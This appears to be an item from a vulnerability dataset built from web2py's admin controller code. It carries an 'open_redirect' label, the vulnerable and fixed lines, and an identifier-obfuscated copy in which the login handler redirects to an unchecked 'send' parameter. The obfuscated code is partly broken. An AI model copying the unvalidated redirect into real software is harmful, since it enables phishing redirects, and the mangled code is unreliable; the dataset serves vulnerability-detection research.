about = safe_read(apath('%s/ABOUT' % app, r=request))
license = safe_read(apath('%s/LICENSE' % app, r=request))
return dict(app=app, about=MARKMIN(about), license=MARKMIN(license), progress=report_progress(app))
def design():
""" Application design handler """
app = get_app()
if not response.flash and app == request.application:
msg = T('ATTENTION: you cannot edit the running application!')
response.flash = msg
if request.vars and not request.vars.token == session.token:
redirect(URL('logout'))
if request.vars.pluginfile is not None and not isinstance(request.vars.pluginfile, str):
filename = os.path.basename(request.vars.pluginfile.filename)
if plugin_install(app, request.vars.pluginfile.file,
request, filename):
session.flash = T('new plugin installed')
redirect(URL('design', args=app))
else:
session.flash = \
T('unable to install plugin "%s"', filename)
redirect(URL(r=request, args=app))
elif isinstance(request.vars.pluginfile, str):
session.flash = T('plugin not specified')
redirect(URL(r=request, args=app))
# If we have only pyc files it means that
# we cannot design
if os.path.exists(apath('%s/compiled' % app, r=request)):
session.flash = \
T('application is compiled and cannot be designed')
redirect(URL('site'))
# Get all models
models = listdir(apath('%s/models/' % app, r=request), '.*\.py$')
models = [x.replace('\\', '/') for x in models]
defines = {}
for m in models:
data = safe_read(apath('%s/models/%s' % (app, m), r=request))
defines[m] = re.findall(REGEX_DEFINE_TABLE, data, re.MULTILINE)
defines[m].sort()
# Get all controllers
controllers = sorted(
listdir(apath('%s/controllers/' % app, r=request), '.*\.py$'))
controllers = [x.replace('\\', '/') for x in controllers]
functions = {}
for c in controllers:
data = safe_read(apath('%s/controllers/%s' % (app, c), r=request))
try:
items = find_exposed_functions(data)
functions[c] = items and sorted(items) or []
except SyntaxError as err:
functions[c] = ['SyntaxError:Line:%d' % err.lineno]
# Get all views
views = sorted(
listdir(apath('%s/views/' % app, r=request), '[\w/\-]+(\.\w+)+$'))
views = [x.replace('\\', '/') for x in views if not x.endswith('.bak')]
extend = {}
include = {}
for c in views:
data = safe_read(apath('%s/views/%s' % (app, c), r=request))
items = re.findall(REGEX_EXTEND, data, re.MULTILINE)
if items:
extend[c] = items[0][1]
items = re.findall(REGEX_INCLUDE, data)
include[c] = [i[1] for i in items]
# Get all modules
modules = listdir(apath('%s/modules/' % app, r=request), '.*\.py$')
modules = modules = [x.replace('\\', '/') for x in modules]
modules.sort()
# Get all private files
privates = listdir(apath('%s/private/' % app, r=request), '[^\.#].*')
privates = [x.replace('\\', '/') for x in privates]
privates.sort()
# Get all static files
statics = listdir(apath('%s/static/' % app, r=request), '[^\.#].*',
maxnum=MAXNFILES)
statics = [x.replace(os.path.sep, '/') for x in statics]
statics.sort()
# Get all languages
langpath = os.path.join(apath(app, r=request), 'languages')
languages = dict([(lang, info) for lang, info
in iteritems(read_possible_languages(langpath))
if info[2] != 0]) # info[2] is langfile_mtime:
# get only existed files
# Get crontab
cronfolder = apath('%s/cron' % app, r=request)
crontab = apath('%s/cron/crontab' % app, r=request)
if not is_gae:
if not os.path.exists(cronfolder):
os.mkdir(cronfolder)
if not os.path.exists(crontab):
safe_write(crontab, '#crontab')
plugins = []
def filter_plugins(items, plugins):
plugins += [item[7:].split('/')[0].split(
'.')[0] for item in items if item.startswith('plugin_')]
plugins[:] = list(set(plugins))
plugins.sort()
return [item for item in items if not item.startswith('plugin_')]
return dict(app=app,
models=filter_plugins(models, plugins),
defines=defines,
controllers=filter_plugins(controllers, plugins),
functions=functions,
views=filter_plugins(views, plugins),
modules=filter_plugins(modules, plugins),
extend=extend,
include=include,
privates=filter_plugins(privates, plugins),
statics=filter_plugins(statics, plugins),
languages=languages,
crontab=crontab,
plugins=plugins)
def delete_plugin():
""" Object delete handler """
app = request.args(0)
plugin = request.args(1)
plugin_name = 'plugin_' + plugin
dialog = FORM.confirm(
T('Delete'),
{T('Cancel'): URL('design', args=app)})
if dialog.accepted:
try:
for folder in ['models', 'views', 'controllers', 'static', 'modules', 'private']:
path = os.path.join(apath(app, r=request), folder)
for item in os.listdir(path):
if item.rsplit('.', 1)[0] == plugin_name:
filename = os.path.join(path, item)
if os.path.isdir(filename):
shutil.rmtree(filename)
else:
os.unlink(filename)
session.flash = T('plugin "%(plugin)s" deleted',
dict(plugin=plugin))
except Exception:
session.flash = T('unable to delete file plugin "%(plugin)s"',
dict(plugin=plugin))
redirect(URL('design', args=request.args(0), anchor=request.vars.id2))
return dict(dialog=dialog, plugin=plugin)
def plugin():
""" Application design handler """
app = get_app()
plugin = request.args(1)
if not response.flash and app == request.application:
msg = T('ATTENTION: you cannot edit the running application!')
response.flash = msg
# If we have only pyc files it means that
# we cannot design
if os.path.exists(apath('%s/compiled' % app, r=request)):
session.flash = \
T('application is compiled and cannot be designed')
redirect(URL('site'))
# Get all models
models = listdir(apath('%s/models/' % app, r=request), '.*\.py$')
models = [x.replace('\\', '/') for x in models]
defines = {}
for m in models:
data = safe_read(apath('%s/models/%s' % (app, m), r=request))
defines[m] = re.findall(REGEX_DEFINE_TABLE, data, re.MULTILINE)
defines[m].sort()
# Get all controllers
controllers = sorted(
listdir(apath('%s/controllers/' % app, r=request), '.*\.py$'))
controllers = [x.replace('\\', '/') for x in controllers]
functions = {}
for c in controllers:
data = safe_read(apath('%s/controllers/%s' % (app, c), r=request))
try:
items = find_exposed_functions(data)
functions[c] = items and sorted(items) or []
except SyntaxError as err:
functions[c] = ['SyntaxError:Line:%d' % err.lineno]
# Get all views
views = sorted(
listdir(apath('%s/views/' % app, r=request), '[\w/\-]+\.\w+$'))
views = [x.replace('\\', '/') for x in views]
extend = {}
include = {}
for c in views:
data = safe_read(apath('%s/views/%s' % (app, c), r=request))
items = re.findall(REGEX_EXTEND, data, re.MULTILINE)
if items:
extend[c] = items[0][1]
items = re.findall(REGEX_INCLUDE, data)
include[c] = [i[1] for i in items]
# Get all modules
modules = listdir(apath('%s/modules/' % app, r=request), '.*\.py$')
modules = modules = [x.replace('\\', '/') for x in modules]
modules.sort()
# Get all private files
privates = listdir(apath('%s/private/' % app, r=request), '[^\.#].*')
privates = [x.replace('\\', '/') for x in privates]
privates.sort()
# Get all static files
statics = listdir(apath('%s/static/' % app, r=request), '[^\.#].*',
maxnum=MAXNFILES)
statics = [x.replace(os.path.sep, '/') for x in statics]
statics.sort()
# Get all languages
languages = sorted([lang + '.py' for lang, info in
iteritems(T.get_possible_languages_info())
if info[2] != 0]) # info[2] is langfile_mtime:
# get only existed files
# Get crontab
crontab = apath('%s/cron/crontab' % app, r=request)
if not os.path.exists(crontab):
safe_write(crontab, '#crontab')
def filter_plugins(items):
regex = re.compile('^plugin_' + plugin + '(/.*|\..*)?$')
return [item for item in items if item and regex.match(item)]
return dict(app=app,
models=filter_plugins(models),
defines=defines,
controllers=filter_plugins(controllers),
functions=functions,
views=filter_plugins(views),
modules=filter_plugins(modules),
extend=extend,
include=include,
privates=filter_plugins(privates),
statics=filter_plugins(statics),
languages=languages,
crontab=crontab)
def create_file():
""" Create files handler """
if request.vars and not request.vars.token == session.token:
redirect(URL('logout'))
try:
anchor = '#' + request.vars.id if request.vars.id else ''
if request.vars.app:
app = get_app(request.vars.app)
path = abspath(request.vars.location)
else:
if request.vars.dir:
request.vars.location += request.vars.dir + '/'
app = get_app(name=request.vars.location.split('/')[0])
path = apath(request.vars.location, r=request)
filename = re.sub('[^\w./-]+', '_', request.vars.filename)
if path[-7:] == '/rules/':
# Handle plural rules files
if len(filename) == 0:
raise SyntaxError
if not filename[-3:] == '.py':
filename += '.py'
lang = re.match('^plural_rules-(.*)\.py$', filename).group(1)
langinfo = read_possible_languages(apath(app, r=request))[lang]
text = dedent("""
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Plural-Forms for %(lang)s (%(langname)s)
nplurals=2 # for example, English language has 2 forms:
# 1 singular and 1 plural
# Determine plural_id for number *n* as sequence of positive
# integers: 0,1,...
# NOTE! For singular form ALWAYS return plural_id = 0
get_plural_id = lambda n: int(n != 1)
# Construct and return plural form of *word* using
# *plural_id* (which ALWAYS>0). This function will be executed
# for words (or phrases) not found in plural_dict dictionary.
# By default this function simply returns word in singular:
construct_plural_form = lambda word, plural_id: word
""")[1:] % dict(lang=langinfo[0], langname=langinfo[1])
elif path[-11:] == '/languages/':
# Handle language files
if len(filename) == 0:
raise SyntaxError
if not filename[-3:] == '.py':
filename += '.py'
path = os.path.join(apath(app, r=request), 'languages', filename)
if not os.path.exists(path):
safe_write(path, '')
# create language xx[-yy].py file:
findT(apath(app, r=request), filename[:-3])
session.flash = T('language file "%(filename)s" created/updated',
dict(filename=filename))
redirect(request.vars.sender + anchor)
elif path[-8:] == '/models/':
# Handle python models
if not filename[-3:] == '.py':
filename += '.py'
if len(filename) == 3:
raise SyntaxError
text = '# -*- coding: utf-8 -*-\n'
elif path[-13:] == '/controllers/':
# Handle python controllers
if not filename[-3:] == '.py':
filename += '.py'
if len(filename) == 3:
raise SyntaxError
text = '# -*- coding: utf-8 -*-\n# %s\ndef index(): return dict(message="hello from %s")'
text = text % (T('try something like'), filename)
elif path[-7:] == '/views/':
if request.vars.plugin and not filename.startswith('plugin_%s/' % request.vars.plugin):
filename = 'plugin_%s/%s' % (request.vars.plugin, filename)
# Handle template (html) views
if filename.find('.') < 0:
filename += '.html'
extension = filename.split('.')[-1].lower()
if len(filename) == 5:
raise SyntaxError
msg = T(
'This is the %(filename)s template', dict(filename=filename))
if extension == 'html':
text = dedent("""
{{extend 'layout.html'}}
<h1>%s</h1>
{{=BEAUTIFY(response._vars)}}""" % msg)[1:]
else:
generic = os.path.join(path, 'generic.' + extension)
if os.path.exists(generic):
text = read_file(generic)
else:
text = ''
elif path[-9:] == '/modules/':
if request.vars.plugin and not filename.startswith('plugin_%s/' % request.vars.plugin):
filename = 'plugin_%s/%s' % (request.vars.plugin, filename)
# Handle python module files
if not filename[-3:] == '.py':
filename += '.py'
if len(filename) == 3:
raise SyntaxError
text = dedent("""
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from gluon import *\n""")[1:]
elif (path[-8:] == '/static/') or (path[-9:] == '/private/'):
if (request.vars.plugin and
not filename.startswith('plugin_%s/' % request.vars.plugin)):
filename = 'plugin_%s/%s' % (request.vars.plugin, filename)
text = ''
else:
redirect(request.vars.sender + anchor)
full_filename = os.path.join(path, filename)
dirpath = os.path.dirname(full_filename)
if not os.path.exists(dirpath):
os.makedirs(dirpath)
if os.path.exists(full_filename):
raise SyntaxError
safe_write(full_filename, text)
log_progress(app, 'CREATE', filename)
if request.vars.dir:
result = T('file "%(filename)s" created',
dict(filename=full_filename[len(path):]))
else:
session.flash = T('file "%(filename)s" created',
dict(filename=full_filename[len(path):]))
vars = {}
if request.vars.id:
vars['id'] = request.vars.id
if request.vars.app:
vars['app'] = request.vars.app
redirect(URL('edit',
args=[os.path.join(request.vars.location, filename)], vars=vars))
except Exception as e:
if not isinstance(e, HTTP):
session.flash = T('cannot create file')
if request.vars.dir:
response.flash = result
response.headers['web2py-component-content'] = 'append'
response.headers['web2py-component-command'] = "%s %s %s" % (
"$.web2py.invalidate('#files_menu');",
"load_file('%s');" % URL('edit', args=[app, request.vars.dir, filename]),
"$.web2py.enableElement($('#form form').find($.web2py.formInputClickSelector));")
return ''
else:
redirect(request.vars.sender + anchor)
def listfiles(app, dir, regexp='.*\.py$'):
files = sorted(
listdir(apath('%(app)s/%(dir)s/' % {'app': app, 'dir': dir}, r=request), regexp))
files = [x.replace('\\', '/') for x in files if not x.endswith('.bak')]
return files
def editfile(path, file, vars={}, app=None):
args = (path, file) if 'app' in vars else (app, path, file)
url = URL('edit', args=args, vars=vars)
return A(file, _class='editor_filelink', _href=url, _style='word-wrap: nowrap;')
def files_menu():
app = request.vars.app or 'welcome'
dirs = [{'name': 'models', 'reg': '.*\.py$'},
{'name': 'controllers', 'reg': '.*\.py$'},
{'name': 'views', 'reg': '[\w/\-]+(\.\w+)+$'},
{'name': 'modules', 'reg': '.*\.py$'},
{'name': 'static', 'reg': '[^\.#].*'},
{'name': 'private', 'reg': '.*\.py$'}]
result_files = []
for dir in dirs:
result_files.append(TAG[''](LI(dir['name'], _class="nav-header component", _onclick="collapse('" + dir['name'] + "_files');"),
LI(UL(*[LI(editfile(dir['name'], f, dict(id=dir['name'] + f.replace('.', '__')), app), _style="overflow:hidden", _id=dir['name'] + "__" + f.replace('.', '__'))
for f in listfiles(app, dir['name'], regexp=dir['reg'])],
_class="nav nav-list small-font"),
_id=dir['name'] + '_files', _style="display: none;")))
return dict(result_files=result_files)
def upload_file():
""" File uploading handler """
if request.vars and not request.vars.token == session.token:
redirect(URL('logout'))
try:
filename = None
app = get_app(name=request.vars.location.split('/')[0])
path = apath(request.vars.location, r=request)
if request.vars.filename:
filename = re.sub('[^\w\./]+', '_', request.vars.filename)
else:
filename = os.path.split(request.vars.file.filename)[-1]
if path[-8:] == '/models/' and not filename[-3:] == '.py':
filename += '.py'
if path[-9:] == '/modules/' and not filename[-3:] == '.py':
filename += '.py'
if path[-13:] == '/controllers/' and not filename[-3:] == '.py':
filename += '.py'
if path[-7:] == '/views/' and not filename[-5:] == '.html':
filename += '.html'
if path[-11:] == '/languages/' and not filename[-3:] == '.py':
filename += '.py'
filename = os.path.join(path, filename)
dirpath = os.path.dirname(filename)
if not os.path.exists(dirpath):
os.makedirs(dirpath)
data = request.vars.file.file.read()
lineno = count_lines(data)
safe_write(filename, data, 'wb')
log_progress(app, 'UPLOAD', filename, lineno)
session.flash = T('file "%(filename)s" uploaded',
dict(filename=filename[len(path):]))
except Exception:
if filename:
d = dict(filename=filename[len(path):])
else:
d = dict(filename='unknown')
session.flash = T('cannot upload file "%(filename)s"', d)
redirect(request.vars.sender)
def errors():
""" Error handler """
import operator
import os
import hashlib
app = get_app()
if is_gae:
method = 'dbold' if ('old' in
(request.args(1) or '')) else 'dbnew'
else:
method = request.args(1) or 'new'
db_ready = {}
db_ready['status'] = get_ticket_storage(app)
db_ready['errmessage'] = T(
"No ticket_storage.txt found under /private folder")
db_ready['errlink'] = "http://web2py.com/books/default/chapter/29/13#Collecting-tickets"
if method == 'new':
errors_path = apath('%s/errors' % app, r=request)
delete_hashes = []
for item in request.vars:
if item[:7] == 'delete_':
delete_hashes.append(item[7:])
hash2error = dict()
for fn in listdir(errors_path, '^[a-fA-F0-9.\-]+$'):
fullpath = os.path.join(errors_path, fn)
if not os.path.isfile(fullpath):
continue
try:
fullpath_file = safe_open(fullpath, 'rb')
try:
error = pickle.load(fullpath_file)
finally:
fullpath_file.close()
except IOError:
continue
except EOFError:
continue
hash = hashlib.md5(to_bytes(error['traceback'])).hexdigest()
if hash in delete_hashes:
os.unlink(fullpath)
else:
try:
hash2error[hash]['count'] += 1
except KeyError:
error_lines = error['traceback'].split("\n")
last_line = error_lines[-2] if len(error_lines) > 1 else 'unknown'
error_causer = os.path.split(error['layer'])[1]
hash2error[hash] = dict(count=1, pickel=error,
causer=error_causer,
last_line=last_line,
hash=hash, ticket=fn)
decorated = [(x['count'], x) for x in hash2error.values()]
decorated.sort(key=operator.itemgetter(0), reverse=True)
return dict(errors=[x[1] for x in decorated], app=app, method=method, db_ready=db_ready)
elif method == 'dbnew':
errors_path = apath('%s/errors' % app, r=request)
tk_db, tk_table = get_ticket_storage(app)
delete_hashes = []
for item in request.vars:
if item[:7] == 'delete_':
delete_hashes.append(item[7:])
hash2error = dict()
for fn in tk_db(tk_table.id > 0).select():
try:
error = pickle.loads(fn.ticket_data)
hash = hashlib.md5(error['traceback']).hexdigest()
if hash in delete_hashes:
tk_db(tk_table.id == fn.id).delete()
tk_db.commit()
else:
try:
hash2error[hash]['count'] += 1
except KeyError:
error_lines = error['traceback'].split("\n")
last_line = error_lines[-2]
error_causer = os.path.split(error['layer'])[1]
hash2error[hash] = dict(count=1,
pickel=error, causer=error_causer,
last_line=last_line, hash=hash,
ticket=fn.ticket_id)
except AttributeError as e:
tk_db(tk_table.id == fn.id).delete()
tk_db.commit()
decorated = [(x['count'], x) for x in hash2error.values()]
decorated.sort(key=operator.itemgetter(0), reverse=True)
return dict(errors=[x[1] for x in decorated], app=app,
method=method, db_ready=db_ready)
elif method == 'dbold':
tk_db, tk_table = get_ticket_storage(app)
for item in request.vars:
if item[:7] == 'delete_':
tk_db(tk_table.ticket_id == item[7:]).delete()
tk_db.commit()
tickets_ = tk_db(tk_table.id > 0).select(tk_table.ticket_id,
tk_table.created_datetime,
orderby=~tk_table.created_datetime)
tickets = [row.ticket_id for row in tickets_]
times = dict([(row.ticket_id, row.created_datetime) for
row in tickets_])
return dict(app=app, tickets=tickets, method=method,
times=times, db_ready=db_ready)
else:
for item in request.vars:
# delete_all rows doesn't contain any ticket
# Remove anything else as requested
if item[:7] == 'delete_' and (not item == "delete_all}"):
os.unlink(apath('%s/errors/%s' % (app, item[7:]), r=request))
func = lambda p: os.stat(apath('%s/errors/%s' %
(app, p), r=request)).st_mtime
tickets = sorted(
listdir(apath('%s/errors/' % app, r=request), '^\w.*'),
key=func,
reverse=True)
return dict(app=app, tickets=tickets, method=method, db_ready=db_ready)
def get_ticket_storage(app):
private_folder = apath('%s/private' % app, r=request)
ticket_file = os.path.join(private_folder, 'ticket_storage.txt')
if os.path.exists(ticket_file):
db_string = safe_read(ticket_file)
db_string = db_string.strip().replace('\r', '').replace('\n', '')
elif is_gae:
# use Datastore as fallback if there is no ticket_file
db_string = "google:datastore"
else:
return False
tickets_table = 'web2py_ticket'
tablename = tickets_table + '_' + app
db_path = apath('%s/databases' % app, r=request)
ticketsdb = DAL(db_string, folder=db_path, auto_import=True)
if not ticketsdb.get(tablename):
table = ticketsdb.define_table(
tablename,
Field('ticket_id', length=100),
Field('ticket_data', 'text'),
Field('created_datetime', 'datetime'),
)
return ticketsdb, ticketsdb.get(tablename)
def make_link(path):
""" Create a link from a path """
tryFile = path.replace('\\', '/')
if os.path.isabs(tryFile) and os.path.isfile(tryFile):
(folder, filename) = os.path.split(tryFile)
(base, ext) = os.path.splitext(filename)
app = get_app()
editable = {'controllers': '.py', 'models': '.py', 'views': '.html'}
for key in editable.keys():
check_extension = folder.endswith("%s/%s" % (app, key))
if ext.lower() == editable[key] and check_extension:
return to_native(A('"' + tryFile + '"',
_href=URL(r=request,
f='edit/%s/%s/%s' % (app, key, filename))).xml())
return ''
def make_links(traceback):
""" Make links using the given traceback """
lwords = traceback.split('"')
# Making the short circuit compatible with <= python2.4
result = (len(lwords) != 0) and lwords[0] or ''
i = 1
while i < len(lwords):
link = make_link(lwords[i])
if link == '':
result += '"' + lwords[i]
else:
result += link
if i + 1 < len(lwords):
result += lwords[i + 1]
i = i + 1
i = i + 1
return result
class TRACEBACK(object):
""" Generate the traceback """
def __init__(self, text):
""" TRACEBACK constructor """
self.s = make_links(CODE(text).xml())
def xml(self):
""" Returns the xml """
return self.s
def ticket():
""" Ticket handler """
if len(request.args) != 2:
session.flash = T('invalid ticket')
redirect(URL('site'))
app = get_app()
myversion = request.env.web2py_version
ticket = request.args[1]
e = RestrictedError()
e.load(request, app, ticket)
return dict(app=app,
ticket=ticket,
output=e.output,
traceback=(e.traceback and TRACEBACK(e.traceback)),
snapshot=e.snapshot,
code=e.code,
layer=e.layer,
myversion=myversion)
def ticketdb():
""" Ticket handler """
if len(request.args) != 2:
session.flash = T('invalid ticket')
redirect(URL('site'))
app = get_app()
myversion = request.env.web2py_version
ticket = request.args[1]
e = RestrictedError()
request.tickets_db = get_ticket_storage(app)[0]
e.load(request, app, ticket)
response.view = 'default/ticket.html'
return dict(app=app,
ticket=ticket,
output=e.output,
traceback=(e.traceback and TRACEBACK(e.traceback)),
snapshot=e.snapshot,
code=e.code,
layer=e.layer,
myversion=myversion)
def error():
""" Generate a ticket (for testing) """
raise RuntimeError('admin ticket generator at your service')
def update_languages():
""" Update available languages """
app = get_app()
update_all_languages(apath(app, r=request))
session.flash = T('Language files (static strings) updated')
redirect(URL('design', args=app, anchor='languages'))
def user():
if MULTI_USER_MODE:
if not db(db.auth_user).count():
auth.settings.registration_requires_approval = False
return dict(form=auth())
else:
return dict(form=T("Disabled"))
def reload_routes():
""" Reload routes.py """
gluon.rewrite.load()
redirect(URL('site'))
def manage_students():
if not (MULTI_USER_MODE and is_manager()):
session.flash = T('Not Authorized')
redirect(URL('site'))
db.auth_user.registration_key.writable = True
grid = SQLFORM.grid(db.auth_user)
return locals()
def bulk_register():
if not (MULTI_USER_MODE and is_manager()):
session.flash = T('Not Authorized')
redirect(URL('site'))
form = SQLFORM.factory(Field('emails', 'text'))
if form.process().accepted:
emails = [x.strip() for x in form.vars.emails.split('\n') if x.strip()]
n = 0
for email in emails:
if not db.auth_user(email=email):
n += db.auth_user.insert(email=email) and 1 or 0
session.flash = T('%s students registered', n)
redirect(URL('site'))
return locals()
# Begin experimental stuff need fixes:
# 1) should run in its own process - cannot os.chdir
# 2) should not prompt user at console
# 3) should give option to force commit and not reuqire manual merge
def git_pull():
""" Git Pull handler """
app = get_app()
if not have_git:
session.flash = GIT_MISSING
redirect(URL('site'))
dialog = FORM.confirm(T('Pull'),
{T('Cancel'): URL('site')})
if dialog.accepted:
try:
repo = git.Repo(os.path.join(apath(r=request), app))
origin = repo.remotes.origin
origin.fetch()
origin.pull()
session.flash = T("Application updated via git pull")
redirect(URL('site'))
except git.CheckoutError:
session.flash = T("Pull failed, certain files could not be checked out. Check logs for details.")
redirect(URL('site'))
except git.UnmergedEntriesError:
session.flash = T("Pull is not possible because you have unmerged files. Fix them up in the work tree, and then try again.")
redirect(URL('site'))
except git.GitCommandError:
session.flash = T(
"Pull failed, git exited abnormally. See logs for details.")
redirect(URL('site'))
except AssertionError:
session.flash = T("Pull is not possible because you have unmerged files. Fix them up in the work tree, and then try again.")
redirect(URL('site'))
elif 'cancel' in request.vars:
redirect(URL('site'))
return dict(app=app, dialog=dialog)
def git_push():
""" Git Push handler """
app = get_app()
if not have_git:
session.flash = GIT_MISSING
redirect(URL('site'))
form = SQLFORM.factory(Field('changelog', requires=IS_NOT_EMPTY()))
form.element('input[type=submit]')['_value'] = T('Push')
form.add_button(T('Cancel'), URL('site'))
form.process()
if form.accepted:
try:
repo = git.Repo(os.path.join(apath(r=request), app))
index = repo.index
index.add([apath(r=request) + app + '/*'])
new_commit = index.commit(form.vars.changelog)
origin = repo.remotes.origin
origin.push()
session.flash = T(
"Git repo updated with latest application changes.")
redirect(URL('site'))
except git.UnmergedEntriesError:
session.flash = T("Push failed, there are unmerged entries in the cache. Resolve merge issues manually and try again.")
redirect(URL('site'))
return dict(app=app, form=form)
def plugins():
app = request.args(0)
from gluon.serializers import loads_json
if not session.plugins:
try:
rawlist = urlopen("http://www.web2pyslices.com/" +
"public/api.json/action/list/content/Package?package" +
"_type=plugin&search_index=false").read()
session.plugins = loads_json(rawlist)
except:
response.flash = T('Unable to download the list of plugins')
session.plugins = []
return dict(plugins=session.plugins["results"], app=request.args(0))
def install_plugin():
app = request.args(0)
source = request.vars.source
plugin = request.vars.plugin
if not (source and app):
raise HTTP(500, T("Invalid request"))
# make sure no XSS attacks in source
if not source.lower().split('://')[0] in ('http','https'):
raise HTTP(500, T("Invalid request"))
form = SQLFORM.factory()
result = None
if form.process().accepted:
# get w2p plugin
if "web2py.plugin." in source:
filename = "web2py.plugin.%s.w2p" % \
source.split("web2py.plugin.")[-1].split(".w2p")[0]
else:
filename = "web2py.plugin.%s.w2p" % cleanpath(plugin)
if plugin_install(app, urlopen(source),
request, filename):
session.flash = T('New plugin installed: %s', filename)
else:
session.flash = \
T('unable to install plugin "%s"', filename)
redirect(URL(f="plugins", args=[app, ]))
return dict(form=form, app=app, plugin=plugin, source=source)
| open_redirect | {
"code": [
"from gluon.tools import Config",
" send = request.vars.send"
],
"line_no": [
15,
121
]
} | {
"code": [
"from gluon.tools import Config, prevent_open_redirect",
" send = prevent_open_redirect(request.vars.send)"
],
"line_no": [
15,
121
]
} |
VAR_0 = True
VAR_1 = 1000
if VAR_0:
if is_mobile:
VAR_43.view = VAR_43.view.replace('default/', 'default.mobile/')
VAR_43.menu = []
import .re
from gluon.admin import *
from gluon.fileutils import .abspath, read_file, write_file
from gluon.utils import web2py_uuid
from gluon.tools import Config
from gluon.compileapp import .find_exposed_functions
from glob import glob
from gluon._compat import .iteritems, PY2, pickle, xrange, urlopen, to_bytes, StringIO, to_native, reload
import gluon.rewrite
import .shutil
import platform
try:
import git
if git.__version__ < '0.3.1':
raise ImportError("Your VAR_25 of git is %VAR_140. Upgrade to 0.3.1 or better." % git.__version__)
VAR_19 = True
except ImportError as VAR_114:
VAR_19 = False
VAR_117 = 'Requires gitpython module, but not VAR_212 or incompatible VAR_25: %s' % VAR_114
from gluon.languages import (read_possible_languages, read_dict, write_dict,
read_plural_dict, write_plural_dict)
if DEMO_MODE and request.function in ['change_password', 'pack',
'pack_custom', 'pack_plugin', 'upgrade_web2py', 'uninstall',
'cleanup', 'compile_app', 'remove_compiled_app', 'delete',
'delete_plugin', 'create_file', 'upload_file', 'update_languages',
'reload_routes', 'git_push', 'git_pull', 'install_plugin']:
session.flash = T('disabled in demo mode')
redirect(URL('site'))
if is_gae and request.function in ('edit', 'edit_language',
'edit_plurals', 'update_languages', 'create_file', 'install_plugin'):
session.flash = T('disabled in GAE mode')
redirect(URL('site'))
if not is_manager() and request.function in ['change_password', 'upgrade_web2py']:
session.flash = T('disabled in multi FUNC_50 mode')
redirect(URL('site'))
if FILTER_APPS and request.args(0) and not request.args(0) in FILTER_APPS:
session.flash = T('disabled in demo mode')
redirect(URL('site'))
if not session.token:
session.token = web2py_uuid()
def FUNC_0(VAR_2):
return len([VAR_69 for VAR_69 in VAR_2.split('\n') if VAR_69.strip() and not VAR_69.startswith('#')])
def FUNC_1(VAR_3, VAR_4='EDIT', VAR_5=None, VAR_6=0):
VAR_20 = os.path.join(apath(VAR_3, VAR_122=request), 'progress.log')
VAR_21 = str(request.now)[:19]
if not os.path.exists(VAR_20):
FUNC_2(VAR_20, 'w').write('[%VAR_140] START\n' % VAR_21)
if VAR_5:
FUNC_2(VAR_20, 'a').write(
'[%VAR_140] %VAR_140 %VAR_140: %s\n' % (VAR_21, VAR_4, VAR_5, VAR_6))
def FUNC_2(VAR_7, VAR_8):
if (DEMO_MODE or is_gae) and ('w' in VAR_8 or 'a' in VAR_8):
class CLASS_2:
def FUNC_64(self, VAR_2):
pass
def FUNC_65(self):
pass
return CLASS_2()
if PY2 or 'b' in VAR_8:
return open(VAR_7, VAR_8)
else:
return open(VAR_7, VAR_8, encoding="utf8")
def FUNC_3(VAR_7, VAR_8='r'):
VAR_22 = FUNC_2(VAR_7, VAR_8)
try:
return VAR_22.read()
finally:
VAR_22.close()
def FUNC_4(VAR_7, VAR_9, VAR_8='w'):
VAR_22 = FUNC_2(VAR_7, VAR_8)
try:
VAR_22.write(VAR_9)
finally:
VAR_22.close()
def FUNC_5(VAR_10=None):
VAR_3 = VAR_10 or request.args(0)
if (VAR_3 and os.path.exists(apath(VAR_3, VAR_122=request)) and
(not MULTI_USER_MODE or is_manager() or
db(db.app.name == VAR_3)(db.app.owner == auth.user.id).count())):
return VAR_3
session.flash = T('App does not exist or you are not authorized')
redirect(URL('site'))
def VAR_197():
VAR_23 = request.vars.send
if DEMO_MODE:
session.authorized = True
session.last_time = t0
if not VAR_23:
send = URL('site')
if session.authorized:
redirect(VAR_23)
elif failed_login_count() >= allowed_number_of_attempts:
time.sleep(2 ** allowed_number_of_attempts)
raise HTTP(403)
elif request.vars.password:
if verify_password(request.vars.password[:1024]):
session.authorized = True
login_record(True)
if CHECK_VERSION:
session.check_version = True
else:
session.check_version = False
session.last_time = t0
if isinstance(VAR_23, list): # ## why does this happen?
VAR_23 = str(VAR_23[0])
redirect(VAR_23)
else:
VAR_210 = login_record(False)
if VAR_210 >= allowed_number_of_attempts:
VAR_43.flash = \
T('admin disabled because too many invalid login attempts')
elif VAR_210 == allowed_number_of_attempts - 1:
VAR_43.flash = \
T('You have one more login attempt before you are locked out')
else:
VAR_43.flash = T('invalid password.')
return dict(VAR_23=send)
def FUNC_7():
session.forget()
session._unlock(VAR_43)
VAR_24, VAR_25 = check_new_version(request.env.web2py_version,
WEB2PY_VERSION_URL)
if VAR_24 in (-1, -2):
return A(T('Unable to check for upgrades'), _href=WEB2PY_URL)
elif not VAR_24:
return A(T('web2py is up to date'), _href=WEB2PY_URL)
elif platform.system().lower() in ('windows', 'win32', 'win64') and os.path.exists("web2py.exe"):
return SPAN('You should upgrade to %s' % VAR_25.split('(')[0])
else:
return sp_button(URL('upgrade_web2py'), T('upgrade VAR_21 to %s') % VAR_25.split('(')[0])
def FUNC_8():
session.authorized = None
if MULTI_USER_MODE:
redirect(URL('user/logout'))
redirect(URL('index'))
def FUNC_9():
if session.pam_user:
session.flash = T(
'PAM authenticated FUNC_50, cannot change password here')
redirect(URL('site'))
VAR_26 = SQLFORM.factory(Field('current_admin_password', 'password'),
Field('new_admin_password',
'password', requires=IS_STRONG()),
Field('new_admin_password_again', 'password'),
VAR_144="span4 well")
if VAR_26.accepts(request.vars):
if not verify_password(request.vars.current_admin_password):
VAR_26.errors.current_admin_password = T('invalid password')
elif VAR_26.vars.new_admin_password != VAR_26.vars.new_admin_password_again:
VAR_26.errors.new_admin_password_again = T('no match')
else:
VAR_15 = abspath('parameters_%VAR_140.py' % request.env.server_port)
FUNC_4(VAR_15, 'password="%s"' % CRYPT()(
request.vars.new_admin_password)[0])
session.flash = T('password changed')
redirect(URL('site'))
return dict(VAR_26=form)
def FUNC_10():
VAR_27 = request.env.web2py_version
VAR_28 = 'file' in request.vars or 'appurl' in request.vars
class CLASS_1(object):
def __call__(self, VAR_9):
if not re.compile('^\w+$').match(VAR_9):
return (VAR_9, T('Invalid application name'))
if not request.vars.overwrite and \
os.path.exists(os.path.join(apath(VAR_122=request), VAR_9)):
return (VAR_9, T('Application exists already'))
return (VAR_9, None)
VAR_29 = CLASS_1()
